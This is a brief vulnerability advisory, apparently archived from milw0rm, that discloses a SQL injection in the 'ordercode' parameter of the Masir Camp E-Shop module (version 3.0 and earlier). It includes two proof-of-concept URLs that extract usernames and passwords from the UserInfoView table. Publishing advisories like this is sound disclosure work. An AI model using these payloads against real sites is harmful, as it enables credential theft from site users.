45 lines
No EOL
1.5 KiB
Text
45 lines
No EOL
1.5 KiB
Text
########################## www.BugReport.ir #######################################
|
|
#
|
|
# AmnPardaz Security Research Team
|
|
#
|
|
# Title: Masir Camp E-Shop Module <= 3.0 SQL Injection
|
|
# Vendor: www.masir.net
|
|
# Vulnerable Version: 3.0 and prior versions
|
|
# Exploit: Available
|
|
# Impact: Medium
|
|
# Fix: N/A
|
|
# Original Advisory: http://bugreport.ir/index_52.htm
|
|
###################################################################################
|
|
|
|
####################
|
|
1. Description:
|
|
####################
|
|
Masir Camp is an advanced website management and content management software. It is suitable for management, control and information presentation.
|
|
"Masir Camp" increases your ability to manage and control your website or weblog.It use Microsoft .Net and MS-SQL. But you have no limitation to use other DBMSs.
|
|
|
|
####################
|
|
2. Vulnerabilities:
|
|
####################
|
|
2.1. Injection Flaws. SQL Injection in "veiworderstatus" in "ordercode" parameter.
|
|
|
|
|
|
####################
|
|
3. Exploits/POCs:
|
|
####################
|
|
http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)--
|
|
http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)--
|
|
|
|
####################
|
|
4. Solution:
|
|
####################
|
|
Edit the source code to ensure that inputs are properly sanitized.
|
|
|
|
####################
|
|
5. Credit:
|
|
####################
|
|
AmnPardaz Security Research & Penetration Testing Group
|
|
Contact: admin[4t}bugreport{d0t]ir
|
|
www.BugReport.ir
|
|
www.AmnPardaz.com
|
|
|
|
# milw0rm.com [2008-09-07] |